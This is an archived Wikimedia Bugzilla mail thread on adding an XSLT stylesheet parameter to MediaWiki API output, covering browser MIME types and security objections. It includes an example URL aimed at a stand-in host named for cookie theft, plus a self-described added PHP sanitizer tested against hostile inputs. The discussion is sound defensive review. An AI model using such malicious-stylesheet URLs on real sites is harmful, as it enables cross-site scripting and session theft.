[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Bryan Tong Minh changed:

What       | Removed  | Added
Status     | REOPENED | RESOLVED
Resolution |          | FIXED

--- Comment #19 from Bryan Tong Minh 2010-01-23 15:28:42 UTC ---
r61419

--
Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email
--- You are receiving this mail because: ---
You are watching all bug changes.
___
Wikibugs-l mailing list
Wikibugs-l@lists.wikimedia.org
https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #18 from Tim Starling 2010-01-17 04:53:55 UTC ---
It's fine, you can revert me.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Bryan Tong Minh changed:

What | Removed | Added
CC   |         | tstarl...@wikimedia.org

--- Comment #17 from Bryan Tong Minh 2010-01-16 21:49:32 UTC ---
I'm passing this through Tim before I apply it, as he changed the mimetype in r55749.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Reedy changed:

What     | Removed | Added
Keywords |         | need-review, patch
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #16 from Bawolff 2009-11-24 03:30:21 UTC ---
Created an attachment (id=6820) --> (https://bugzilla.wikimedia.org/attachment.cgi?id=6820)
make it send a mime type that more browsers recognize

This makes the type attribute on processing instruction, so that part is not really needed, as old mozilla will not work regardless.)
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #15 from Bawolff 2009-11-23 23:12:21 UTC ---
Note, in addition, some browsers (older gecko based browsers) are strict about mime type that the xslt is sent with.

Pretty please (With a cherry on top) make the xslt file be sent with a mime type of application/xml and change the

This would actually make this work on a wide variety of browsers.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #14 from Alexandre Emsenhuber [IAlex] 2009-10-02 08:41:39 UTC ---
*** Bug 20939 has been marked as a duplicate of this bug. ***
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Bawolff changed:

What | Removed | Added
CC   |         | bawolff...@gmail.com

--- Comment #13 from Bawolff 2009-09-29 01:36:31 UTC ---
Note, the parameter should add the header:

not

As text/xml is not recognized by all browsers (see [[w:XSLT]]). Internet Explorer in particular seems to need text/xsl.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #12 from Tisza Gergő 2009-08-22 18:03:16 UTC ---
You could add a site-wide javascript which checks if the user is on a certain page, gets the XML file via an AJAX query and adds the XSLT file, but having a query parameter for it is much more straightforward, and does not require JS code that will be downloaded by all users but never used by most.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Brion Vibber changed:

What       | Removed  | Added
CC         |          | br...@wikimedia.org
Status     | RESOLVED | REOPENED
Resolution | FIXED    |

--- Comment #11 from Brion Vibber 2009-08-22 17:20:16 UTC ---
Can't the client-side processing add in the XSLT reference itself from the consumed XML? This seems unnecessary.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Roan Kattouw changed:

What       | Removed | Added
Status     | NEW     | RESOLVED
Resolution |         | FIXED
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #10 from Bryan Tong Minh 2009-07-13 21:38:30 UTC ---
Done in r53194.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Platonides changed:

What | Removed | Added
CC   |         | platoni...@gmail.com

--- Comment #9 from Platonides 2009-07-11 20:20:54 UTC ---
There should also be an option for using its own stylesheets (eg. user Foo can use User:Foo/skin.xls). That would need to add that extension as user-page protected.

At least, the parameter should contain the namespace for future compatibility of the above use case.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Bryan Tong Minh changed:

What       | Removed                | Added
AssignedTo | roan.katt...@gmail.com | bryan.tongm...@gmail.com
Status     | REOPENED               | NEW

--- Comment #8 from Bryan Tong Minh 2009-07-11 19:54:50 UTC ---
Should the parameter be xslt= or xsl= ? Furthermore I believe that the extension should be .xsl, right?
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #7 from Roan Kattouw 2009-07-11 18:28:07 UTC ---
(In reply to comment #6)
> Created an attachment (id=6322) --> (https://bugzilla.wikimedia.org/attachment.cgi?id=6322) [details]
> Adds xslt parameter to format=xml
>
> Untested patch that adds a stylesheet declaration in the form
> MediaWiki:.xslt.
>

Patch reviewed, feel free to commit after testing.

> Possible problems:
> * Content-type: Does it matter for browsers which content type the stylesheet
> is served with?
> * Can the URL be local or is it required to be full?
> * If non-existent title or invalid title is given, fails silently. It could
> throw an error, but maybe it is better if simply the raw XML is given.
> (Perhaps indicate the error in a comment?)
>

Throwing a warning is probably best.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #6 from Bryan Tong Minh 2009-07-11 11:28:09 UTC ---
Created an attachment (id=6322) --> (https://bugzilla.wikimedia.org/attachment.cgi?id=6322)
Adds xslt parameter to format=xml

Untested patch that adds a stylesheet declaration in the form MediaWiki:.xslt.

Possible problems:
* Content-type: Does it matter for browsers which content type the stylesheet is served with?
* Can the URL be local or is it required to be full?
* If non-existent title or invalid title is given, fails silently. It could throw an error, but maybe it is better if simply the raw XML is given. (Perhaps indicate the error in a comment?)
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #5 from Tisza Gergő 2009-07-11 09:13:40 UTC ---
(In reply to comment #4)
> And what if someone points to a malicious XSLT? E.g.
> api.php?action=query&xslt=http://malicious.site/steal-cookies.xslt

As I said in the summary, XSLT files should be restricted to the MediaWiki namespace: for example, api.php?action=query&xslt=foo could be translated to http://wiki.domain/wiki/MediaWiki:XSLT-foo.xsl"; type="text/xsl" ?>. Anyone with malicious intent and write access to the MW namespace can already pull far worse tricks.

> Also, this is API. *Application* programming interface. It's not intended to
> format a user-readable output. I suggest WONTFIX.

And it would not format a user-readable output; it would format the exact same output with an XSLT header added. One could argue that the application is the browser in this case, were not arguments about the semantics of the A in API utterly pointless. Are there any actual drawbacks in allowing administrators to create user-readable formats of queries (with links to the relevant tools etc.) in a template-like format instead of a procedural language (JavaScript) which is much less convenient for this task?
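
The restriction proposed in comment #5 (a short name mapped to a fixed MediaWiki: title, so an external URL like the one in comment #4 is never emitted), sketched as an added example that is not code from this bug, its patches or MediaWiki. The function name, the character allow-list, the length limit and the warning text are assumptions; the base URL is the placeholder host used in comment #5.

```php
<?php
// Added example: hypothetical helper, not MediaWiki's implementation.

// Placeholder base URL taken from the example in comment #5.
const WIKI_BASE = 'http://wiki.domain/wiki/';

/**
 * Map the xslt= request value to an xml-stylesheet processing instruction.
 * Returns [pi, warning]; exactly one of the two is null.
 */
function xsltProcessingInstruction(string $param): array
{
    // Allow-list a short name only. Schemes, slashes, colons, dots and
    // quotes are rejected, so the value cannot point off-site, select
    // another namespace, or break out of the href attribute.
    if (preg_match('/^[A-Za-z0-9_-]{1,64}$/D', $param) !== 1) {
        return [null, 'Invalid xslt value, raw XML returned without a stylesheet'];
    }

    // Namespace, prefix and extension are fixed server-side, never
    // taken from the request.
    $href = WIKI_BASE . 'MediaWiki:XSLT-' . $param . '.xsl';

    // Escape anyway, so a later loosening of the pattern stays safe.
    $pi = '<?xml-stylesheet href="' . htmlspecialchars($href, ENT_QUOTES)
        . '" type="text/xsl" ?>';
    return [$pi, null];
}

// Constructed sample inputs; the second is the URL quoted in comment #4.
$samples = [
    'foo',
    'http://malicious.site/steal-cookies.xslt',
    '//malicious.site/x',
    'User:Foo/skin',
    'foo" ?><x',
];

foreach ($samples as $value) {
    [$pi, $warning] = xsltProcessingInstruction($value);
    echo str_pad($value, 42), ' => ', $pi ?? "WARNING: $warning", "\n";
}
```

Only `foo` yields a processing instruction; every other sample produces the warning and no stylesheet reference, which matches the "raw XML plus a warning" behaviour discussed in comments #6 and #7.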
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #4 from Victor Vasiliev 2009-07-11 06:18:18 UTC ---
(In reply to comment #2)
> The processing will still be done client-side: The bug opener refers to the
> which could
> optionally be added to the top of the XML document in order to have a direct
> transformation when viewed in the web browser.
>

And what if someone points to a malicious XSLT? E.g.
api.php?action=query&xslt=http://malicious.site/steal-cookies.xslt

Also, this is API. *Application* programming interface. It's not intended to format a user-readable output. I suggest WONTFIX.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

--- Comment #3 from Tisza Gergő 2009-07-10 23:57:17 UTC ---
And it does not introduce any new XSS vulnerabilities if the XSLT file must come from the MediaWiki namespace; those who can write it can make XSS attacks much easier through the site-wide JS files.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Bryan Tong Minh changed:

What       | Removed  | Added
Status     | RESOLVED | REOPENED
Resolution | WONTFIX  |

--- Comment #2 from Bryan Tong Minh 2009-07-10 14:34:10 UTC ---
(In reply to comment #1)
> Processing of the XML output should be done client-side, not server-side, and
> certainly not in a way that introduces XSS vulnerabilities. Closing as
> WONTFIX.
>

The processing will still be done client-side: The bug opener refers to the which could optionally be added to the top of the XML document in order to have a direct transformation when viewed in the web browser.
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528

Roan Kattouw changed:

What       | Removed | Added
CC         |         | roan.katt...@gmail.com
Status     | NEW     | RESOLVED
Resolution |         | WONTFIX

--- Comment #1 from Roan Kattouw 2009-07-06 21:51:34 UTC ---
Processing of the XML output should be done client-side, not server-side, and certainly not in a way that introduces XSS vulnerabilities. Closing as WONTFIX.